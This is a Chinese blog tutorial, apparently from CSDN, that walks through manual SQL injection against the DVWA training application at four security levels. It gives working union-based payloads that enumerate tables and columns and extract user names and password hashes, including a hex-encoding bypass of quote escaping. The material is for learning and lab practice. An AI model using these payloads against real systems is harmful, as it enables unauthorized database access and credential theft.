html sql注入_渗透测试新手入门之DVWA(SQL注入)篇

最新推荐文章于 2023-07-22 20:31:03 发布
最新推荐文章于 2023-07-22 20:31:03 发布
阅读量186 收藏
点赞数
文章标签: html sql注入

一、SQL注入概念

SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。

e77df6a46db3b94a966e1ffc716f022f.png

二、手工注入常规思路

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定回显位置

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.得到数据

将DVWA的级别设置为low

1.分析源码,可以看到没有对参数做任何的过滤,直接带入数据库进行查询,分析sql查询语句,可能存在字符型sql注入。

b388cccf99462734b9fa1f7852db6075.png

2.判断sql是否存在存入,以及注入的类型

1' and '1'='1

24398e1f71370cd93e0d62e8aa287ebd.png

3.猜解SQL查询语句中的字段数

3.1 1' order by 2#

3bf72ade4c5269dd4af5cc1560ae4fd6.png

3.2 1' order by 3#

4d5732fcc7d67618f44d8014fb9657f7.png

3.3从上面两个图可以说明,SQL语句查询的表的字段数是2

4.确定显示的位置(SQL语句查询之后的回显位置)

1' union select 1,2# #下图可以看出有2个回显

f0ff448929cf2da42950822f635f1382.png

5.查询当前的数据库,以及版本

1' union select version(),database()#

b6fb6e346074973cc089b8d74a869cc3.png

6.获取数据库中的表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

4d453979ac4cc292c4d6d6d8530867c8.png

7.获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

cc5562a9a9e93c71b267f11b21f121d0.png

8.获得字段中的数据

1' union select user,password from users#

656a9b48a38e235df93ab6f55aa00530.png

将DVWA的级别设置为Medium

1.下图可以看到中级加入了一些防御,不让用户输入,只提供选择(可以用burpsuit抓包来绕过),分析源码可以看到对参数使用mysql_real_escape_string函数转义sql语句中的一些特殊字符,查看sql查询语句可以看出可能存在数字型sql注入

dcd73a29d1f69b6ccb8bc3cd75346200.png
8574bdd0d1331512ca1e7d31830b8620.png

2.通过burpsuit抓包,修改数据包,绕过防御

2.1判断注入点,以及注入的类型,下图可以看到,存在注入,注入类型是数字型注入

7767690516c3691c1732616b60ed9cc1.png

2.2猜解sql查询语句中的字段的个数,下图说明字段的个数为2

7e58fa2930e0989e52ee734328ee0924.png
0d6bcba3530735f0bb40c561bc6e1857.png

2.3.确定回显的位置,下图可以说明有2个回显位置

1 union select 1,2#

ef3fd834ce661b79c393728a108d9ad6.png

2.4.获取当前数据库的名称以及版本

1 union select database(),version()#

9813ce4c44dce7bf4348dc14e69b9a27.png

2.5获取数据库中的所有表

1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

1996aa41e3b7b82ef88496b435f33fab.png

2.6获取表中的所有字段名

考虑到单引号被转义,可以利用 16 进制进行绕过

union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

f24d9ee60a97b6b46c46392713063cab.png

2.7获取字段中的数据

1 union select user,password from users#

34d99a8ddd76821e4d57b5234425048e.png

将DVWA的级别设置为High

1.将dvwa设置为高级,可以看出,点击”here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制了查询条数,可以通过burpsuit抓包,修改数据包实现绕过

b650c0f0fa691ba2aa35a0deaf0e46c8.png
0c88533ce25531e123f863961b6ee5e4.png
0fa3e5530bf6e397afa420c3a7b1de57.png

2.2获得密码

9b8d194db95e5431a1b638217cba5cb4.png

将DVWA的级别设置为Impossible

1.分析源码可以看到使用了PDO技术,杜绝了SQL注入

42720660177efdb107b5a918857f3e32.png
weixin_39984982
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
html sql注入_特殊场景的sql注入思路
weixin_39577289的博客
12-01 117
上一介绍了sql注入的基础知识以及手动注入方法,但是在实际的环境中往往不会像靶场中那样简单。今天我就来为大家介绍一种特殊场景的sql注入思路。用户名与密码分开验证的情况第一个场景我们以We Chall平台的Training: MySQL II 一题为例。进入题目可以看到有一段提示,以及一个登录框:提示的信息大概意思就是,这道题与MySQL I相同,但是这次我们需要使用更高级的注入才能骗过这种身份...
html页面 sql注入,一个容易的SQL注入
weixin_36483301的博客
06-03 1026
一个简单的SQL注入本例采用JSP+Servlet+Mysql:1. 数据库:数据库名:sqlinjectCREATE DATABASE sqlinject;建user表:Table: userCreate Table: CREATE TABLE `user` (`id` int(11) NOT NULL AUTO_INCREMENT,`name` varchar(20) NOT NULL,`se...
细说——SQL注入
LainWith的博客
10-09 7608
目录SQL是什么?什么是SQL注入漏洞原理漏洞原因为什么会有SQL注入注⼊点可能存在的位置漏洞危害提交方法判断注入点判断字符型还是数字型sql注入绕过获取网站路径SQL 注入读写文件1. 数据库支持文件读写2. 当前用户具有文件权限3. 知道文件绝对路径查询方式及报错盲注⭐查询方式报错盲注报错注入函数二次注入原理实施步骤举例堆叠查询DNSlog脑图常见数据库,及注入相关⭐注释符、数据库端口数据库文件后缀名特有的数据库查看当前用户或权限ASCII转换函数不同数据库注入结果的区别⭐Sql注入中连接字符串常用函数
SQL注入经验方法总结
太阳照耀我走四方
07-02 1259
SQL注入经验方法总结
DVWASQL注入(非盲注)
天空之蓝的博客
11-17 1161
说明users表中有8个字段,分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。上面第一个SQL之所以失败,网上又说是编码格式的原因,修改表的编码格式一直就可以解决。说明执行的SQL查询语句中只有两个字段,即这里的First name、Surname。这里也可以通过输入union select 1,2,3…输入:1’ union select 1,2#输入:1’ union select 1#
【网络安全】DVWA靶场实战&BurpSuite内网渗透
九芒星的博客
07-22 3925
借助DVWA靶场,对用户登录进行渗透测试
CTFHub-web(SQL注入)
qq_49502930的博客
12-04 217
ctf技能树sql注入
DVWA靶场SQL Injection(SQL注入
m0_51150495的博客
06-08 1307
1.找到注入点;2.通过回显找到闭合方式;3.使用order by判断列数;4.使用union select判断显示位;5.使用union select爆出数据库名和版本号;6.已知数据库名后使用union select爆出表名和列名;7.最后爆出列名内所需信息,如user和password;8.此外还可使用union select来读取文件。1.输入1‘发现有如下闭合报错,则判断存在注入点,2.输入1''后出现回显,说明闭合为单引号'3. 判断列数,输入至1' order by 3#时出现报错,说明列数为
DVWASQL注入(低级)
heyingcheng的博客
11-17 2260
注意:我们在输入框输入id=1' order by 1#,通过改造sql语句修改了应用程序逻辑,执行的sql语句实际上数据库中执行的是:select * from 表 where id='1' order by 1 #'。由于#已经注释掉了后面所有的内容,所以实际上的效果:select * from 表 where id='1' order by 1(#也可以换成--)继续输入1’and'1'='1或者1'='1发现可以正常回显,所以目前可以十分准确的判断存在的是sql注入中的字符型注入。
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA下的SQL注入
07-25
SQL
学习之sql注入漏洞网址的创建
06-06
学习sql注入,往往需要一个可注入的网址,这文章很好的解决了这个问题,我们可以自己创建一个自己用的地址来学习,可以让我们为所欲为。
网络渗透测试平台_DVWA_201807
07-04
DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
node-v12.22.1-linux-x64.tar.xz
最新发布
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基于微信小程序的校园综合服务小程序
04-29
大学生毕业设计、大学生课程设计作业
node-v7.8.0-linux-armv7l.tar.gz
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
毕业设计:Python招聘分析系统论文(源码 + 数据库 + 说明文档)
04-29
毕业设计:Python招聘分析系统论文(源码 + 数据库 + 说明文档) 2 需求分析 9 2.1功能需求分析 9 2.2 可行性分析 9 2.2.1 技术可行性 9 2.2.2 经济可行性 9 2.2.3 操作可行性 10 2.2.4 发展可行性 10 2.3系统性需求分析 10 2.4招聘分析系统管理功能 11 3 总体设计 12 3.1 系统结构 12 3.2 数据库设计 12 3.2.1 数据库实体 12 3.2.2 数据库表设计 13 4 运行设计 15 4.1 招聘热门行业分析 15 4.2热门岗位分析界面 15 4.3招聘岗位学历分析界面 16 4.4岗位分布分析界面 16 5 系统测试 18 5.1测试环境与条件 18 5.2功能测试 18 5.3安全测试 18 5.4可用性测试 18 5.5测试结果分析 19
win11修复-网络正常-永远是地球小图标的bug
04-29
win11修复-网络正常-永远是地球小图标的bug
安装并配置SQL注入实验平台DVWA,输入任意SQL注入语句测试
05-18
首先,你需要下载DVWA并安装它。可以通过访问以下链接来下载DVWA:https://github.com/ethicalhack3r/DVWA。 安装过程可能因平台而异,但通常涉及将文件夹解压缩到您的Web服务器的根目录(例如/var/www/html/)。 安装完成后,您需要配置DVWA。为此,请复制config/config.inc.php.dist文件并将其重命名为config.inc.php。然后在config.inc.php中编辑以下行: ``` $_DVWA[ 'db_user' ] = 'your_database_username'; $_DVWA[ 'db_password' ] = 'your_database_password'; $_DVWA[ 'db_database' ] = 'your_database_name'; ``` 将“your_database_username”替换为您的数据库用户名,将“your_database_password”替换为您的数据库密码,将“your_database_name”替换为您的数据库名称。 完成配置后,您可以通过访问您的Web服务器上的DVWA文件夹来访问DVWA。 接下来,您可以使用任意SQL注入语句测试DVWA。例如,您可以通过以下方式尝试注入: 1. 在DVWA登录页面上,输入用户名“admin”和密码“password”。 2. 在“ID”字段中输入以下内容: ``` 1' OR '1'='1 ``` 3. 单击“登录”按钮。 此注入应使您成功登录,因为注入条件始终为真。您可以在登录后尝试其他注入语句,以便进一步测试DVWA的安全性。但请注意,您应该只在您自己的测试环境中进行此类测试,而不是在未经授权的系统上进行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值